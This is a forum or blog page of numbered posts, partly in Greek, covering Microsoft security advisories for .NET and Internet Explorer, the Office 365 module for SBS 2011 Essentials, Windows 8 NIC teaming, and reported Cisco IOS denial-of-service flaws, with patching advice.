    Microsoft has released .NET Framework updates to fix these vulnerabilitie. If you have web servers or clients that use the .NET Framework, you should download, test and deploy the corresponding updates immediately.
    Due to the exhaustive and varied nature of .NET Framework installations (1.1, 2.0, 3.5.x, and 4.0 running on many Windows platforms), we will not include links to all the updates here. We recommend you visit the “Affected and Non-Affected Software” section of Microsoft’s bulletin for those details.
    If possible, we also recommend you use Windows Update to automatically download and install the appropriate .NET Framework on client computers. That said, you may still want to keep production servers on a manual update process, to avoid upgrade-related problems that could affect business-critical machines.
    For All Users:
    This attack typically leverages normal looking HTTP requests, which you must allow for users to reach your web application. Therefore, Microsoft’s patches are your primary recourse.
    Status:
    Microsoft has released updates to correct this vulnerability.
    References:
    Microsoft Security Bulletin MS11-100 Microsoft Security Advisory Microsoft Security Blog Post Technical Write-up on ASP.NET Hash Table DoS Flaw
  22. Ioannis Zontos
    Στις 19 /12/2011 έχει κυκλοφορήσει το Office 365 Integration Module for Windows Small Business Server 2011 Essentials (OIM).
    Η πελάτες που έχουν Microsoft Small Business Essentials μπορούν να το κατεβάσουν από το Microsoft Download Center.
    Αυτό το Module επιτρέπει στους πελάτες που διαθέτουν
    Αυτό το Module επιτρέπει στους πελάτες που διαθέτουν Small Business Server 2011 Essentials να έχουν τις βασικές τους υπηρεσίες όπως Domain services File services ,etc on-premise και πολύ εύκολα να έχουν integrate στο Office 365 τα email τους και ότι άλλες υπηρεσίες διαθέτουν στο cloud και όλα αυτά με το μικρότερο διαχειριστικό κόστος
    Το συγκεκριμένο integration module θα μας βοηθήσει να έχουμε κάπου κεντρικά την διαχείριση των user και του server management , και επιπλέον βοηθά την μικρή επιχείρηση να διαχειρίζεται τους χρηστές τοπικά και στο cloud από την ιδια console ,
    Σε συνεργασία με το Windows 7 Professional Pack Add-in for SBS Essentials και τον Windows Phone Connector η Microsoft έχει δώσει όλα τα εργαλεία που χρειάζεται η μικρή εταιρεία για να μπορεί να διαχειριστεί το IT infrastructure , τα email και το collaboration το , mobility και τα client computing
    Περισσότερες πληροφορίες για τον SBS Essentials θα βρείτε στο webcast here.
  23. Ioannis Zontos
    Ένα από τα πολλά νέα χαρακτηριστικά των Windows 8 είναι το team στις καρτες δικτυου και το Load Balancing και Fail Over (LBFO). Αυτό είναι, μεταξύ πολλών άλλων, μια τεράστια αναμενόμενη βελτίωση.
    Τώρα για το teaming
    Δουλεύει parent & in the guest.

    ■ Δεν υπάρχει ανάγκη για οτιδήποτε άλλο , μόνο η κάρτα δικτύου NIC και τα Windows 8, αυτό είναι όλο..
    ■ Ένα όμορφο και απλό GUI για να ρυθμίσουμε το teamnig
    ■ Πλήρης υποστήριξη PowerShell για τα παραπάνω
    ■ Μπορούμε να κάνουμε team με κάρτες από διαφορετικούς προμηθευτές NIC
    Τώρα αναλόγως του switch που έχουμε
    ■ υποστηρίζει μια σειρά από τρόπους για το team
    1. ■ Switch Independent: Η λειτουργία αυτή χρησιμοποιεί αλγόριθμους που δεν απαιτούν από to switch να κανει κατι για το teaming. Το όφελος από αυτό είναι ότι μπορείτε να χρησιμοποιήσετε πολλούς switch για fault tolerance χωρίς ειδικές απαιτήσεις, (stack switch ), αρα μειωμένο κόστος
    2. . ■ Switch Dependent : Εδώ το switch παίζει το ρόλο του , έχει σχέση με το teaming . Ως αποτέλεσμα αυτό απαιτεί όλες τις κάρτες δικτύου στο team να συνδεθoυν με τον ίδιο switch εκτός αν έχετε stack switch .Σε αυτή την φάση έχουμε δύο παραλλαγές που υποστηρίζονται.
    Static (IEEE 802.3ad) or Generic:
    LACP (IEEE 802.1ax, also known as dynamic teaming).
    ■There are 2 load balancing options
    1.Hyper-V Port: Virtual machines have independent MAC addresses which can be used to load balance traffic
    2.Address Hash: A hash (there a different types, see the white paper mention at the end for details on this

     
    Τώρα τι υποστηρίζετε στο widows teaming και τι όχι
    Scalability.You can have up to 32 NIC in a single team
    There is no THEORETICAL limit on how many virtual interfaces you can create on a team.You can mix NIC of different speeds in the same team
    Δεν υποστηρίζετε
    TCP ChimneyTCP Chimney is not supported with network adapter teaming in Windows Server “8” Beta. Αυτό μπορεί να αλλάξει
    RDMA & NIC Teaming Do Not Mix

  24. Ioannis Zontos
    Severity: High
    Summary:
    · This vulnerability affects: All current versions of Internet Explorer, running on all current versions of Windows (to varying extents)
    · How an attacker exploits it: By enticing one of your users to visit a malicious web page
    · Impact: Various; in the worst case an attacker can execute code on your user's computer, gaining complete control of it
    · What to do: Deploy the appropriate Internet Explorer patches immediately, or let Windows Automatic Update do it for you
    Exposure:
    In a security bulletin released today as part of Patch Day, Microsoft describes four new vulnerabilities in Internet Explorer (IE) 9.0 and earlier versions, running on all current versions of Windows. Microsoft rates the aggregate severity of these new flaws as Critical.
    The four vulnerabilities differ technically, but two of them share the same general scope and impact. These two issues involve memory corruption flaws related to the way IE mishandles various HTML objects. If an attacker can lure one of your users to a web page containing malicious web code, he could exploit either of these vulnerabilities to execute code on that user's computer by inheriting that user's privileges. Typically, Windows users have local administrative privileges, in which case the attacker gains complete control of your users' computers.
    This update also fixes two less severe information disclosure vulnerabilities, which you can read more about in Microsoft's bulletin.
    Today's attackers commonly hijack legitimate web pages and booby-trap them with malicious code. Often, even recognizable and authentic websites get hijacked in this way, and are forced to deliver drive-by download attacks. To avoid these types of attacks, we recommend that you install Microsoft's IE updates as quickly as you can.
    Solution Path:
    These patches fix serious issues. You should download, test, and deploy the appropriate IE patches immediately, or let Windows Automatic Update do it for you.
    This link takes you directly to the “Affected and Non-Affected Software” section of Microsoft's IE bulletin, where you can find links for the various IE updates.
    Status:
    Microsoft has released patches to fix these vulnerabilities.
    References:
    · MS Security Bulletin MS12-010

  25. Ioannis Zontos
    Potential Zero Day Cisco IOS DoS Vulnerabilities
    Ένα νέο πρόβλημα δημοσιεύτηκε στην Bugtraq mailing list [ 1 / 2 ], για Cisco's router and switch 2 νεα zero day Denial of Service (DoS) vulnerabilities. Οι αρχική ερεύνα έγινε από την penetration test team Of NCNIPC (China).
    Οι πληροφορίες που έχουν δώσει είναι ελάχιστες και από την cisco ούτε το έχουν διαψεύσει αλλά ούτε και το έχουν αποδεχτεί
    Μικρό απόσπασμα για αυτό
    . They do say, attackers can trigger one DoS with a UDP packet flood and the other with SNMP packet sent to improper ports. In either case, the attack can put your IOS devices in a non-responsive state, requiring a reboot. By carrying out this sort of attach against your gateway router, and attacker can failry easily knock you offline
    In the meantime, keep your eyes out for UDP floods
    Cisco has since replied to these vulnerability allegations, saying they are researching the situations. However, they did not confirm or deny the DoS flaws, nor have they had time to release patches. Until they do, you can mitigate the risk of one of the flaws by disabling SNMP on your IOS device.
×
×
  • Create New...